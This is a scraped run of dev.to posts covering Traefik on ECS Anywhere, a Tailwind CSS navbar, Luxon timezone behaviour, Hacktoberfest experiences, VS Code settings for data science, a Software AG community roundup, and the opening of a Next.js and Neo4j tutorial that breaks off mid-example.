* Installed ECS Compose-X (version 0.22 and above). See below.
#### Compose-X install
You can install it locally for your user
```shell
pip install pip -U;
pip install --user ecs-composex
```
or install it in a python virtual/isolated enviroment
```shell
python3 -m venv compose-x
source compose-x/bin/activate
pip install pip -U
pip install ecs-composex
```
Once you have installed it, run the following command that will ensure we have the necessary settings and resources to get started.
```shell
ecs-compose-x init
```
### Clone the labs repo
Clone the repo, and head to the configuration files.
```shell
git clone https://github.com/compose-x/compose-x-labs.git
cd traefik/part_2/
```
In the current files, you will have to edit to change the domain name in-use.
You can either edit it with your preferred IDE, or simply run
```shell
sed -i 's/bdd-testing.compose-x.io/<your_domain_name.tld>/g'
```
If your domain is not maintained in AWS Route53, you will need to head over to [the Let's Encrypt ACME documentation](https://doc.traefik.io/traefik/https/acme/) in order to use a different validation method.
### Getting ready to deploy
The deployment to ECS Anywhere is only a command away
```shell
CLUSTER_NAME=MyExistingECSCLuster ecs-compose-x up \
-n traefik-anywhere \
-d templates \
-f docker-compose.yaml \
-f ecs-anywhere.yaml
```
Compose-X will render all of the CFN templates and store them in your local folder (under `templates`), as well as in AWS S3. It is required to be in S3 for CFN nested stacks.
After a few minutes, you should have running on your ECS Anywhere instances, Traefik.
### Adding SSL Certificates backup.
Let's Encrypt "production" endpoint, has a rate limit in place for the number of certificates requested per domain.
So if you are new to this, we recommend to [use the Let's Encrypt staging environment](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/ecs-anywhere.yaml#L36-L37), which will allow not to hit the rate limit.
Sadly, it seems that the persistent storage of the file that holds the SSL certificates requested by Traefik to Let's Encrypt is not a feature that we might see coming in any time soon.
So instead, we are going to implement the backup-and restore ourselves.
Using 2 sidecars, one to restore the files prior to traefik starting, and another constantly watching for a change to automatically backup the file to AWS S3, we will ensure that we don't request certificates we already did provision before.
To deploy the solution, we added the [backup.yaml](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/backup.yaml) file to our deployment command.
**Note**: the S3 bucket already exists for us, and if you want to use an existing one, you will need to adopt the `Lookup` [Tags](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/backup.yaml#L77-L79) in order to use your own/the right bucket.
So now, we deploy our updated definition to AWS
```shell
CLUSTER_NAME=MyExistingECSCLuster ecs-compose-x up \
-n traefik-anywhere \
-d templates \
-f docker-compose.yaml \
-f ecs-anywhere.yaml
-f backup.yaml
```
**Hint**: the order of the files **does matter**.
And that's it! You now have successfully deployed Traefik to ECS Anywhere, with automated backup & restore for your certificates.
To add additional services you wish Traefik to route to, simply deploy them with the appropriate labels, just like we used in the demo for the [whoami service](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/ecs-anywhere.yaml#L140-L154)
| johnpreston |
1,231,214 | Tailwind CSS tutorial #3: Responsive Navbar | Hey everyone, in many apps you need a navbar which slides in if you click on a hamburger icon and... | 0 | 2022-10-26T17:26:59 | https://dev.to/fromshubhi/tailwind-css-tutorial-3-responsive-navbar-47ip | tailwindcss, css, codenewbie | Hey everyone, in many apps you need a navbar which slides in if you click on a hamburger icon and which is also responsive. In this tutorial, we are going to see how to build that.
## What we are building:
We will be building a simple navbar with HTML and CSS. We will use the below design as the guideline for our component.

## Requirements
-Prior knowledge of HTML and CSS
-[HTML template for navbar](https://github.com/codewithshubhi/learn-tailwind-css/blob/main/navindex.html)
-Code editor of your choice.
## Implementation
**Step1**
Get the [html code template](https://github.com/codewithshubhi/learn-tailwind-css/blob/main/navindex.html). Install tailwind CSS however, you will need to add the tailwind CSS you have installed into our project and you can do by using the “link” tag to link the tailwind CSS file to the HTML template.
`npm install -D tailwindcss postcss autoprefixer
npx tailwindcss init -p
`
**Code:**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Navigation</title>
<link rel="stylesheet" href="style.css">
</head>
<body></body>
</html>
```
Checkout detailed setup of tailwind [here](https://dev.to/shubhicodes/get-started-with-tailwind-css-2g98)
since we know it's a navigation component we will use the `nav` element as our wrapping container. Let's also add a class of `navbar`.
```html
<nav class="navbar"></nav>
```
**Step 2**
Next, I would review the content inside the navigation.
I would split the content into two parts:
1. The brand content/body
2. The navigational items
The reason I would split this up is that the brand content isn't necessarily a navigation item and I want the HTML to have the correct meaning.
**Step 3**
Next, let's implement option one from Step 2, The `brand` content. Since we know from the requirements it needs to be a link I would use the anchor tag. I will also add a class name of the `brand` so we can style it later.
**Our code should now look like this:**
```html
<nav class="navbar">
<a class="brand" href="#">My Portfolio</a>
</nav>
```

**Step 4**
Next, let's implement option two from Step 2, the navigational items. I would classify these as a list of links. Keeping with ensuring our HTML structure is semantic I would use a list to structure the items.
Our code should now look like this:
```html
<nav class="navbar">
<a class="brand" href="#">My portfolio</a>
<ul>
<li>
<a href="#">Home</a>
</li>
<li>
<a href="#">Blog </a>
</li>
<li>
<a href="#">About Me</a>
</li>
<li>
<a href="#">Contact</a>
</li>
</ul>
</nav>
```

**Step 5**
At this stage, we will add the necessary menu items to help users navigate around the website. Below is the code for the menu
**Code**
```html
<!-- Nav menu -->
<div
class="w-full lg:w-auto block lg:flex lg:items-center lg:inline-block hidden"
id="navbar"
>
<div class="lg:flex-grow text-2xl text-center space-x-3">
<a href="#" class="block lg:inline-block hover:text-green-400 mt-4">
Home
</a>
<a href="#" class="block lg:inline-block hover:text-green-400 mt-4">
Blog
</a>
<a
href="#"
class="block lg:inline-block hover:text-green-400 mt-4 mb-3z"
>
About Me
</a>
<a
href="#"
class="lg:inline-block hover:text-green-400 mt-6 border rounded border-white hover:border-transparent hover:bg-white px-4"
>
Contact
</a>
</div>
</div>
</nav>
```
We added some classes to the menu to help it fit into our navigation bar.

In the code above, we used SVG to create a hamburger for the small screen and gave it a height and weight of 6. We also changed the color to gray. Other classes we included are
Flex is used to set the hamburger menu along with the items in the Tailwind CSS navbar.
**Step 6**
We added some classes to the menu to help it fit into our navigation bar.
Add the mobile button
Next, we are going to create the menu for small screens. Then We can go ahead to use JavaScript to toggle the menu we created.
The JavaScript code will be written using the `<script>` tag.
We can go ahead and grab the HTML tag we use to apply this functionality.
**Code**
```html
<script>
var navbar = document.getElementById("navbar");
const toggle_nav = () => {
navbar.classList.toggle("hidden");
};
// Close menu is window size increases
window.onresize = () => {
let viewportWidth = window.innerWidth;
if (viewportWidth > 1050) {
navbar.classList.add("hidden");
}
};
</script>
```
## Overview
**The overall code will be like the code below**:
[Repo link](https://github.com/codewithshubhi/learn-tailwind-css/blob/main/navbar.html)
## Conclusion
With some basic knowledge of HTML and CSS, we were able to create a fully functioning navbar component.
If you liked this article, consider following me on [Dev.to](https://dev.to/shubhicodes) for my latest publications. You can reach me on [Twitter](https://twitter.com/heyShubhi).
Keep learning! Keep coding!! 💛
| fromshubhi |
1,269,048 | Luxon Timezones and JS-Date interop | If you ever wondered how luxon and native JS-Dates (with TimeZones) behave when converting them... | 0 | 2022-11-23T16:00:20 | https://dev.to/nidomiro/luxon-timezones-and-js-date-interop-5ceg | javascript, webdev, typescript | If you ever wondered how [luxon](https://moment.github.io/luxon/) and native [JS-Dates](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Date?retiredLocale=de) (with TimeZones) behave when converting them between each other and [ISO-Date-Strings](https://www.w3.org/TR/NOTE-datetime) here are my tests:
```ts
import {DateTime} from 'luxon'
const date = new Date();
const offset = date.getTimezoneOffset();
console.log('TimeZoneOffset(min): ', offset * -1);
console.log('TimeZoneOffset( h ): ', offset / 60 * -1);
/*
TimeZoneOffset(min): 60
TimeZoneOffset( h ): 1
*/
const strLocal = '2023-07-21T09:35:31.825+01:00'
const strUtc = '2023-07-21T08:35:31.825Z'
const jsDateLocal = new Date(strLocal)
const jsDateUTC = new Date(strUtc)
const dateTimeLocal = DateTime.fromISO(strLocal)
const dateTimeUTC = DateTime.fromISO(strUtc)
console.log(`ToLocal`)
console.table({
jsDateLocal: jsDateLocal.toLocaleString(),
jsDateUTC: jsDateUTC.toLocaleString(),
dateTimeLocal: dateTimeLocal.toLocaleString(),
dateTimeUTC: dateTimeUTC.toLocaleString(),
dateTimeLocalFull: dateTimeLocal.toLocaleString(DateTime.DATETIME_FULL),
dateTimeUTCFull: dateTimeUTC.toLocaleString(DateTime.DATETIME_FULL),
})
/*
┌───────────────────┬───────────────────────────────────┐
│ (index) │ Values │
├───────────────────┼───────────────────────────────────┤
│ jsDateLocal │ '7/21/2023, 10:35:31 AM' │
│ jsDateUTC │ '7/21/2023, 10:35:31 AM' │
│ dateTimeLocal │ '7/21/2023' │
│ dateTimeUTC │ '7/21/2023' │
│ dateTimeLocalFull │ 'July 21, 2023 at 10:35 AM GMT+2' │
│ dateTimeUTCFull │ 'July 21, 2023 at 10:35 AM GMT+2' │
└───────────────────┴───────────────────────────────────┘
*/
console.log(`ToIsoTimestamp`)
console.table({
jsDateLocalToIso: jsDateLocal.toISOString(),
jsDateUTCToIso: jsDateUTC.toISOString(),
dateTimeLocalToIso: dateTimeLocal.toISO(),
dateTimeUtcToIso: dateTimeUTC.toISO(),
dateTimeLocalToUtcToIso: dateTimeLocal.toUTC().toISO(),
dateTimeUtcToUtcToIso: dateTimeUTC.toUTC().toISO(),
})
/*
┌─────────────────────────┬─────────────────────────────────┐
│ (index) │ Values │
├─────────────────────────┼─────────────────────────────────┤
│ jsDateLocalToIso │ '2023-07-21T08:35:31.825Z' │
│ jsDateUTCToIso │ '2023-07-21T08:35:31.825Z' │
│ dateTimeLocalToIso │ '2023-07-21T10:35:31.825+02:00' │
│ dateTimeUtcToIso │ '2023-07-21T10:35:31.825+02:00' │
│ dateTimeLocalToUtcToIso │ '2023-07-21T08:35:31.825Z' │
│ dateTimeUtcToUtcToIso │ '2023-07-21T08:35:31.825Z' │
└─────────────────────────┴─────────────────────────────────┘
*/
console.log(`jsDate to DateTime to Iso`)
console.table({
fromJsLocal: DateTime.fromJSDate(jsDateLocal, ).toISO(),
fromJsUTC: DateTime.fromJSDate(jsDateUTC).toISO(),
fromJsLocalWithUtc: DateTime.fromJSDate(jsDateLocal, {zone: 'utc'}).toISO(),
fromJsUTCWithUtc: DateTime.fromJSDate(jsDateUTC, {zone: 'utc'}).toISO(),
fromJsLocalToUtc: DateTime.fromJSDate(jsDateLocal).toUTC().toISO(),
fromJsUTCToUtc: DateTime.fromJSDate(jsDateUTC).toUTC().toISO(),
fromJsLocalWithEuropeBerlin: DateTime.fromJSDate(jsDateLocal, {zone: 'Europe/Berlin'}).toISO(),
fromJsUTCWithEuropeBerlin: DateTime.fromJSDate(jsDateUTC, {zone: 'Europe/Berlin'}).toISO(),
fromJsLocalWithEuropeBerlinToUtc: DateTime.fromJSDate(jsDateLocal, {zone: 'Europe/Berlin'}).toUTC().toISO(),
fromJsUTCWithEuropeBerlinToUtc: DateTime.fromJSDate(jsDateUTC, {zone: 'Europe/Berlin'}).toUTC().toISO(),
})
/*
┌──────────────────────────────────┬─────────────────────────────────┐
│ (index) │ Values │
├──────────────────────────────────┼─────────────────────────────────┤
│ fromJsLocal │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsUTC │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsLocalWithUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsUTCWithUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsLocalToUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsUTCToUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsLocalWithEuropeBerlin │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsUTCWithEuropeBerlin │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsLocalWithEuropeBerlinToUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsUTCWithEuropeBerlinToUtc │ '2023-07-21T08:35:31.825Z' │
└──────────────────────────────────┴─────────────────────────────────┘
*/
``` | nidomiro |
1,231,897 | My Hacktober Experience | October, also known as Hacktober for devs, is a really awesome month. Hacktoberfest is a very good... | 0 | 2022-10-30T06:15:07 | https://dev.to/dilutewater/my-hacktober-experience-46nm | programming, beginners, opensource, hacktoberfest | October, also known as Hacktober for devs, is a really awesome month. Hacktoberfest is a very good oppurtunities for beginners to start their open source journey. Open source is a really fun ride to begin.
I participated in hacktoberfest as well as a hackathon this month and also a opensource event.
This was kind of my first exeprience for all of these.
## Hacktoberfest
This year, it was my first hacktober. I made some basic contributions in few open source repos. Thats the beauty of hacktoberfest. Even beginners are welcome. Even simplest of the simplest contributions are appreciated. Even if most people do it for swags, still its a nice motivation for beginners to start.
I completed my 4 contribution just in few days and also received the holopin badges. They look pretty cool to be honest. Here is my holopin board.
**Live Holopin Board (This may be changed with different badges if viewed at a later date):**
[](https://holopin.io/@dilutewater)
**Static version:**

## Hackathon

So this month, our college organized a hackathon as well. I decided to participate in it. This was my first ever hackathon. It was quite fun and I also learned a lot. I had an awesome team to work with.
We were not even looking to win any prize this time. However after completing we think we can win the replit track prize. But the results for the track are still not out. We are still waiting for 1it.
## DelhiFOSS event

I also attended the DelhiFOSS event hosted by FOSS United. It was also very very fun and informative. Met many awesone peoples there. Learned a lot.
Attending all these events was really fun. I learned and enjoyed a lot. Met many new people.
You can also follow me on twitter for regular updates.
Twitter: [https://twitter.com/notnotrachit](https://twitter.com/notnotrachit)
| dilutewater |
1,232,229 | Data Science: Best Vscode settings | VS code has become the tool for any programming project and data science is one of them. Most data... | 20,156 | 2022-10-27T11:30:00 | https://dev.to/azadkshitij/best-vscode-settings-for-data-scientist-48nk | python, datascience, vscode, jupyter |
VS code has become the tool for any programming project and data science is one of them. Most data scientists like to use jupyter notebook or jupyter lab but what they don't know is VS Code support jupyter notebook and you can do much more than just use jupyter notebook. one of the best feature of vscode for data science is **Interactive python window** will talk about that later, lets talk about some other features.
## 1. IntelliSense
> IntelliSense is a general term for various code editing features including: code completion, parameter info, quick info, and member lists. IntelliSense features are sometimes called by other names such as "code completion", "content assist", and "code hinting."

When we install python extension for vscode it comes with IntelliSense and it works as intended. You can improve IntelliSense with type annotation in your project.

As you can see in above image there is no suggestions for the name parameter but as soon as we define type of parameter vscode will show all the available methods related to the datatype (below image).

## 2. Indent (Space vs Tabs)
> At the end of the day, tabs versus spaces is truly a matter of preference, however the tab is still the character specifically designed for indentation, and using one tab character per indentation level instead of 2 or 4 spaces will use less disk space / memory / compiler resources and the like.
It depends on individual, I prefer tab and set it as 2 space (2 column) width as it occupies less space and I only have to key only one time and every stroke matters. To change indent size in vscode follow below steps...


## 3. Text Warp
Most of us don't prefer text to run off the screen. To toggle wrapping on or off on a per-file basis, simply press `ALT + Z` . If you almost _never_ want to turn text-wrapping off, you can make it the default. Inside `settings.json`, simply paste in the following code, and your text will wrap by default:
```json
{ "editor.wordWrap": "on" }
```
## 4. Evaluate Math Expression
You know vscode have inbuild calculator? You can evaluate basic math operation. Just select the expression, press `ctrl+shift+p` and search for "Evaluate and you will find the option".

## 5. Format on Save
Install *[black](https://github.com/psf/black)*, a python formatter that will help us follow a similar formatting for all our data science projects. command:
```bash
pip install black
```
Open your VSCode settings, by going 'Code -> Preferences -> Settings'. Search for "python formatting provider" and select "black" from the dropdown menu:

In the settings, search for "format on save" and enable the "Editor: Format on Save" option:

## 6. Snippets
You can install extensions for snippets but you can also define your own snippets. With this features you can type few character to type repeated code like imports statements, plotting functions etc.

## 7. Interactive Python Window
VSCode support interactive python window, where you can run python code just like jupyter notebook but even better as your main code is stored in a single python file. This is a very important and productive features for data scientist. For this to work you need to change the setting with...
```json
"jupyter.sendSelectionToInteractiveWindow": true // <---- Very Important
```

## 8. Remote access to VMs
Odds are that you’ll run code in a server, a virtual machine or some other hardware that you might want to connect to via SSH. Fortunately, you can connect to any of them and still carry on using your local VS Code installation, by using the [Remote SSH](https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh) extension.
## 9. CSV
As a data scientists you have to deal with a lot of file types that stores the data, CSV is the most famous file type to store huge amount of data. As CSV is a txt file so you can open it directly in vscode but to make it more usable and readable we can use extensions such as...
1. [Rainbow CSV](https://marketplace.visualstudio.com/items?itemName=mechatroner.rainbow-csv) which will provide highlighting for your csv file..

2. [Edit csv](https://marketplace.visualstudio.com/items?itemName=janisdd.vscode-edit-csv) which has a excel like UI to edit and update your csv file.

As the article is getting longer we will talk about some more settings in future articles so make sure to follow the series to not miss any updates. If you have anything to say comment down below I'm new to blog writing so any type of feedback is appreciated Thanks. | azadkshitij |
1,232,476 | Software AG Tech Community Highlights - Q3, 2022 | The past three months have been really busy in the Software AG Tech Community. See what you might... | 0 | 2022-10-28T08:35:50 | https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275/1 | community, news, iot, webmethods | ---
title: Software AG Tech Community Highlights - Q3, 2022
published: true
date: 2022-10-05 08:15:43 UTC
tags: community, news, iot, webmethods
canonical_url: https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275/1
---
The past three months have been really busy in the [Software AG Tech Community](https://tech.forums.softwareag.com/). See what you might have missed below!
## Feedback and Ideas section
You can now share your feedback not only about the Tech Community, but any product or platform. We have introduced:
- [Community news, tips & tricks](https://tech.forums.softwareag.com/c/feedback/community-news/5) - Discover new features, community enhancements, and user guides.
- [Feature requests](https://tech.forums.softwareag.com/c/feedback/feedback-feature-requests/137) - Let us know how we can improve! Share your ideas and feature requests. What will help you do your job better? What do you like or dislike in Software AG’s products, solutions and platform?
- [Coffee break (discuss anything)](https://tech.forums.softwareag.com/c/feedback/coffee-break/138) - This is the place to discuss topics that don’t have a “right” answer and talk about anything.
- [Hecktoberfest](https://tech.forums.softwareag.com/c/feedback/hecktoberfest/140) - For the month of October we are giving you the opportunity to post things that made your head tilt sideways wondering: “What the Heck?” Why is this like that? Read more [below](https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275#hecktoberfest-7)
## iPaaS Puzzle
In September, we launched the iPaaS Puzzles. The idea is simple - we challenge ourselves with a puzzle that is fun to solve, brings value, and at the same time is a great way to improve our integration skills. We are currently at the [3rd iPaaS Puzzle: Who’s Country is improving the most on the UN Sustainable Development Goals?](https://tech.forums.softwareag.com/t/3rd-ipaas-puzzle-who-s-country-is-improving-the-most-on-the-un-sustainable-development-goals/263977)
See also the previous riddles and how members like [@anela.osmanovic](https://tech.forums.softwareag.com/u/anela.osmanovic) solved them.
- [1st iPaaS Puzzle: Local Drought Water Calculator](https://tech.forums.softwareag.com/t/1st-ipaas-puzzle-local-drought-water-calculator/260665)
- [2nd iPaaS Puzzle: Prevent “Epic Fails” in Customer Service - Forum - Software AG Tech Community & Forums](https://tech.forums.softwareag.com/t/2nd-ipaas-puzzle-prevent-epic-fails-in-customer-service/263483)
- [3rd iPaaS Puzzle: Who’s Country is improving the most on the UN Sustainable Development Goals?](https://tech.forums.softwareag.com/t/3rd-ipaas-puzzle-who-s-country-is-improving-the-most-on-the-un-sustainable-development-goals/263977)
## webMethods Community Get-Together
We experimented with a new, more engaging, webinar format last month. 30 minutes update and the rest of the time quickly answering all of your questions. Check out the recordings of both webinars and let us know in the comments how you like them. We are planning on doing more of these in the near future.
- [Recording: webMethods Community Get-Together APJ/EMEA September 2022](https://tech.forums.softwareag.com/t/recording-webmethods-community-get-together-apj-emea-september-2022/262630)
- [Recording: webMethods Community Get-Together EMEA/Americas September 2022](https://tech.forums.softwareag.com/t/recording-webmethods-community-get-together-emea-americas-september-2022/262665)
## [Cumulocity IoT Aug 2022 update](https://tech.forums.softwareag.com/t/cumulocity-iot-aug-2022-update/260298)
The [latest release of Cumulocity IoT, version 10.13](https://cumulocity.com/releasenotes/release-10-13-0/overview-10-13-0/), is now available, and we’ve focused on enabling our customers to remain competitive, innovative, and to drive revenue – be smarter and faster in a world that constantly demands faster and better results.
- Learn more: [Cumulocity IoT Aug 2022 update](https://tech.forums.softwareag.com/t/cumulocity-iot-aug-2022-update/260298)
## IoT Survey
Please fill in our [\*\*\* Cumulocity IoT Developer Survey 2022 \*\*\*](https://forms.office.com/r/w1rRzxUp0S)
Let us know what is important to you and what we should do to bring the **best developer experience** for you.
The whole survey will only take **~5 min of your time**.
- Learn more: [IoT Developer Survey](https://tech.forums.softwareag.com/t/iot-developer-survey-2022/262679)
## Hecktoberfest
We invite you to take part in our WTH October (Hecktoberfest)!
It is the right place to share with everyone your very own “what/why the heck? !” moments you experience when using our software or services. We would like to collect these, hopefully solve/clarify some of them or put them into our development pipeline.
- Learn more: [Hecktoberfest - One Month, Your Voice, Your Thoughts!](https://tech.forums.softwareag.com/t/hecktoberfest-one-month-your-voice-your-thoughts/264229)
- Direct Link to the [Hecktoberfest Category](https://tech.forums.softwareag.com/c/feedback/hecktoberfest/140) on Tech Community, where the first [‘WTH …?’ question](https://tech.forums.softwareag.com/t/wth-webmethods-integration-server-why-cant-i-keep-losing-acls-every-time-i-export-the-packages/264255/4) has been posted and answered already.
## Most valuable contributor award
In August we presented our long time Community Guru **Rob Eamon [@reamon](https://tech.forums.softwareag.com/u/reamon)** with our _Most valuable contributor award_. Rob has been a member of our forums for more than a decade and his posts have helped thousands of users. His comments are always very insightful and bring value to any conversation. With the knowledge he’s sharing and his honest feedback Rob has been really inspirational for our team and the whole community!
[](https://tech.forums.softwareag.com/u/reamon/summary)
## Top Members of the quarter
[
Cheers to our Top Community members and Most Valuable Contributors](https://tech.forums.softwareag.com/t/top-members-q3-2022/264198)
#### — **You rock!**!
## TECHniques Issue 3
<a href="https://tech.forums.softwareag.com/t/techniques-issue-3-2022/264404">TECHniques newsletter - Issue 3, 2022</a>
## New API content
- [Reverse monetization](https://tech.forums.softwareag.com/t/reverse-monetization/260351)
- [Deflector and shield](https://tech.forums.softwareag.com/t/deflector-and-shield/260513)
- [Automating API Testing with webMethods API Management and Postmans](https://tech.forums.softwareag.com/t/automating-api-testing-with-webmethods-api-management-and-postman/260727)
- [Integrating Azure AD with webMethods Developer Portal](https://tech.forums.softwareag.com/t/integrating-azure-ad-with-webmethods-developer-portal/263551)
- [Developer Portal User Onboarding](https://tech.forums.softwareag.com/t/developer-portal-user-onboarding/263573)
- [API Security with webMethods API Management and Noname Security](https://tech.forums.softwareag.com/t/api-security-with-webmethods-api-management-and-noname-security/263598)
- [webMethods Developer Portal trying out an OAuth2 Protected API](https://tech.forums.softwareag.com/t/webmethods-developer-portal-trying-out-an-oauth2-protected-api/263703)
- [webMethods Developer Portal trying out an JWT Protected API](https://tech.forums.softwareag.com/t/webmethods-developer-portal-trying-out-an-jwt-protected-api/263708)
- [webMethods Developer Portal CSP (Content Security Policy) Troubleshooting](https://tech.forums.softwareag.com/t/webmethods-developer-portal-csp-content-security-policy-troubleshooting/263736)
## Top Knowledge base and blog articles
- [How to get started with Cloud Remote Access for Cumulocity IoT](https://tech.forums.softwareag.com/t/how-to-get-started-with-cloud-remote-access-for-cumulocity-iot/258446/2)
- [webMethods.io Integration - First steps, tutorials & how-tos](https://tech.forums.softwareag.com/t/webmethods-io-integration-first-steps-tutorials-how-tos/255635/2)
- [The New Learning Portal is live](https://tech.forums.softwareag.com/t/the-new-learning-portal-is-live/259267/2)
- [webMethods.io Integration workflow: Automatically send PMs to multiple users in Discourse platform](https://tech.forums.softwareag.com/t/webmethods-io-integration-workflow-automatically-send-pms-to-multiple-users-in-discourse-platform/258972/4)
- [webMethods.io B2B processing message using RNIF 2.0](https://tech.forums.softwareag.com/t/webmethods-io-b2b-processing-message-using-rnif-2-0/259584/2)
- [How many gateways?](https://tech.forums.softwareag.com/t/how-many-gateways/259911)
- [Post Message in Slack Channel for operation in Developer Portal](https://tech.forums.softwareag.com/t/post-message-in-slack-channel-for-operation-in-developer-portal/260586)
- [Welcome Email to a new Contact on Microsoft Dynamics](https://tech.forums.softwareag.com/t/welcome-email-to-a-new-contact-on-microsoft-dynamics/259596)
- [Troubleshooting OAuth 2.0 compliant Email Listener](https://tech.forums.softwareag.com/t/troubleshooting-oauth-2-0-compliant-email-listener/263692/1)
- [Compressing Integration Server’s Apache Derby Embedded Database](https://tech.forums.softwareag.com/t/compressing-integration-servers-apache-derby-embedded-database/263620/1)
## Top forum discussions
- [1st iPaaS Puzzle: Local Drought Water Calculator](https://tech.forums.softwareag.com/t/1st-ipaas-puzzle-local-drought-water-calculator/260665)
- [CD is failed to installed](https://tech.forums.softwareag.com/t/cd-is-failed-to-installed/260617)
- [How to read/iterate the data in Array (1:V)](https://tech.forums.softwareag.com/t/how-to-read-iterate-the-data-in-array-1-v/263472)
- [Reading Event MO by means of SmartREST](https://tech.forums.softwareag.com/t/reading-event-mo-by-means-of-smartrest/258878)
- [Switching between COAP and HTTP via REST API?](https://tech.forums.softwareag.com/t/switching-between-coap-and-http-via-rest-api/259138)
- [Getting Error while connecting to AWS SQS](https://tech.forums.softwareag.com/t/getting-error-while-connecting-to-aws-sqs/258849)
- [How to fetch all the JDBC connection details in IS page](https://tech.forums.softwareag.com/t/how-to-fetch-all-the-jdbc-connection-details-in-is-page/259957)
- [Unable to publish messages through thin-io.edge to child devices that are created with the cumulocity IoT Open API](https://tech.forums.softwareag.com/t/unable-to-publish-messages-through-thin-io-edge-to-child-devices-that-are-created-with-the-cumulocity-iot-open-api/263510)
- [The Things Network web hook receiving message “cannot access endpoint: /service/ttn-integration”](https://tech.forums.softwareag.com/t/the-things-network-web-hook-receiving-message-cannot-access-endpoint-service-ttn-integration/260702)
- [IS not joining the cluster during initial configuration](https://tech.forums.softwareag.com/t/is-not-joining-the-cluster-during-initial-configuration/258805)
* * *
> This article is part of the TECHniques newsletter blog - technical tips and tricks for the Software AG community. [Subscribe](https://info.softwareag.com/TechCommunity-Subscription-Page.html) to receive our quarterly updates or read the [latest issue](https://tech.forums.softwareag.com/techniques-latest).
[Read full topic](https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275/1) | techcomm_sag |
1,232,500 | Using Neo4j in your next Next.js Project | After watching a few glossy new videos from the Next.js Conf 2022, I thought I'd take a closer look... | 0 | 2022-10-27T16:38:36 | https://dev.to/adamcowley/using-neo4j-in-your-next-nextjs-project-77 | javascript, webdev, nextjs, neo4j | After watching a few glossy new videos from the [Next.js Conf 2022](https://nextjs.org/conf), I thought I'd take a closer look at Next.js and see how the framework could help me to build my next Neo4j-based web application.
Fundamentally, adding Neo4j integration to a Next.js project is similar to any other Node.js/TypeScript-based project. However, the various Data Fetching methods and both Server-side and Client-side rendering raise some interesting challenges.
Let's take a look at how we can use Neo4j in a Next.js project.
## What is Next.js?
Next.js is a React-based framework which provides an opinionated starting point for building web applications. The framework provides building blocks for many of the common features that developers need to consider when building modern applications such as UI components, Data Fetching, and Rendering.
The framework also focuses on performance, providing the ability to pre-generate static HTML pages using _Static-site Generation (SSG)_, render HTML on the server at request time using _Server-side rendering (SSR)_ and also render React components on the client-side using _Client-side Rendering (CSR)_.
You can [read more about Next.js here](https://nextjs.org/learn/foundations/about-nextjs/what-is-nextjs).
## What is Neo4j?
The chances are, if you have found this article via search, you'd know more about Next.js than Neo4j. Neo4j is a _Graph Database_, a database consisting of _Nodes_ - which represent entities or _things_, connected together and Relationships.
Neo4j comes into its own when working with highly connected datasets or as an alternative for complex relational database schemas where many joins are required. The golden rule is that if your queries have three or more joins, you should really be looking at using a graph database.
You can [read more about Neo4j here](https://neo4j.com/developer/graph-database/).
## Why Neo4j and Next.js?
Next.js is gaining momentum as one of the most popular frameworks for building modern web applications. The benefit of using Next.js is that your front-end and back-end code are all self-contained within the same subfolders of the `api/` directory.
If you are building a Neo4j-backed project, building an integration with the [Neo4j JavaScript Driver](https://github.com/neo4j/neo4j-javascript-driver/) is relatively straightforward. All you need to do is create a new instance of the driver within the application, then use the driver to execute Cypher statements and retrieve results.
Of course, you can use the Neo4j JavaScript driver directly from React components, but this means exposing database credentials through the client which can be a security risk. Instead, if you require on-demand data from Neo4j in client-side rendering, you can create an API handler to execute the Cypher statement server-side and return results.
## Creating a free Neo4j AuraDB Instance
[Neo4j AuraDB](https://neo4j.com/cloud/platform/aura-graph-database/), Neo4j's fully managed cloud service provides one **AuraDB Free** instance to all users, completely free and no credit card is required.
If you sign in or register for Neo4j Aura at [cloud.neo4j.io](https://cloud.neo4j.io), you will see a **New Instance** button at the top of the screen. If you click this button, you will be able to choose between an empty database or one pre-populated with sample data.

For this article, I suggest choosing the `Graph-based Recommendations` dataset, which consists of Movies, Actors, Directors and user ratings. This dataset is a nice introduction to graph concepts and can be used to build a movie recommendation algorithm. We use it across [GraphAcademy](https://graphacademy.neo4j.com/?ref=dev.to), including the [Building Neo4j Applications with Node.js](https://graphacademy.neo4j.com/courses/app-nodejs/?ref=dev.to) course.
Click **Create** to create your instance. Once you have done so, a modal window will appear with a generated password.

Click the **Download** button to download your credentials, we'll need these a little later on. After a couple of minutes, your instance will be ready to explore. You can click the **Explore** button to [explore the graph with Neo4j Bloom](https://neo4j.com/product/bloom/), or query the graph using Cypher by clicking the **Query tab**.

You can take a look at that in your own time, for now, let's focus on our Next.js application.
## Creating a new Next.js Project
You can create a new Next.js project from a template using the [Create Next App CLI command](https://nextjs.org/docs/api-reference/create-next-app).
```sh
npx create-next-app@latest
```
The command will prompt you for a project name and install any dependencies.
## Adding Neo4j Helper Functions
To install the Neo4j JavaScript Driver, first install the dependency:
```sh
npm install --save neo4j-driver
# or yarn add neo4j-driver
```
Next.js comes with [built-in support for Environment Variables](https://nextjs.org/docs/basic-features/environment-variables), so we can simply copy the credentials file downloaded from the Neo4j Aura Console above, rename it to `.env` and place in the directory root.
We can then access those variables through the `process.env` variable:
```js
const { NEO4J_URI, NEO4J_USERNAME, NEO4J_PASSWORD } = process.env
```
Next, create a new folder called `lib/` and then create a new `neo4j.js` file. You will want to import the `neo4j` object from the `neo4j-driver` dependency and use the credentials above to create a driver instance
```js
